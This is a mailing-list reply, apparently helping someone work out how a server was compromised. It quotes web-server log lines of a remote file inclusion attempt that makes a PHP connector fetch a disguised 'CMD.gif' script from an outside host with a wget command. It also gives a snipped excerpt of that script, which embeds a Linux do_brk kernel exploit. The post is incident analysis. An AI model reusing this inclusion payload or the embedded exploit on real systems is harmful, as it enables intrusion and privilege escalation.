[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: ***DEB*: Re: help needed

213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget HTTP/1.0" 403 495 "http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget"; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget HTTP/1.0" 403 499 "http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget"; "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

http://213.202.214.106/CMD.gif isn't a gif.

[snip]

if ($kernel == "write") {
   $kernel = "/*\n" .
             " * hatorihanzo.c\n" .
             " * Linux kernel do_brk vma overflow exploit.\n" .
             " *\n" .
             " * The bug was found by Paul (IhaQueR) Starzetz <paul@isec.pl>\n" .
             " *\n" .
             " * Further research and exploit development by\n" .
             " * Wojciech Purczynski <cliph@isec.pl> and Paul Starzetz.\n" .
             " *\n" .
             " * (c) 2003 Copyright by IhaQueR and cliph. All Rights Reserved.\n" .
             " *\n" .
             " * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY USE\n" .
             " * OF PRESENTED CODE IS STRICTLY PROHIBITED.\n" .

[/snip]

I think this will give you an idea of what happened.
Reply to: